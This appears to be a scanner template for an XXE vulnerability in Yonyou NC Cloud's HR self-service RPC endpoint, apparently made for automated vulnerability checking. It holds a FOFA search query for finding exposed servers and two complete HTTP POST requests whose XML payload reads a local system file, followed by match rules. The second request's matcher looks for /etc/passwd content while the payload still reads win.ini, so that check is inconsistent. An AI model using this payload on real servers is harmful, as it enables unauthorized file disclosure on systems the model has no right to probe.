## id: VEID-2024-0103
## name: 用友NC_CLOUD_smartweb2.RPC.d_XML外部实体注入
## author: hack007x
## severity: high
## tags: veid,XXE,veid2024
## description:用友NC_CLOUD存在XXE
## fofa-query: app="用友-UFIDA-NC"
## verification: true





POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>


#@ condition: and
#@ stop_scan: true
#@ matcher: status_code == 200
#@ matcher: header["Content-Type"] contains "xml"
#@ matcher: body contains "[fonts]" && body contains "[extensions]"

---

POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

#@ condition: and
#@ stop_scan: true
#@ matcher: status_code == 200
#@ matcher: header["Content-Type"] contains "html"
#@ matcher: body matches /root:[^:]*:[0-9]+:[0-9]+:/ && body contains "/root:/bin/bash" 





# @VEIL-STAMP: b26bd3af9ddf3eb1ee6494f0a663a318d065e2fbc8a9455ac3071f87c6e69781
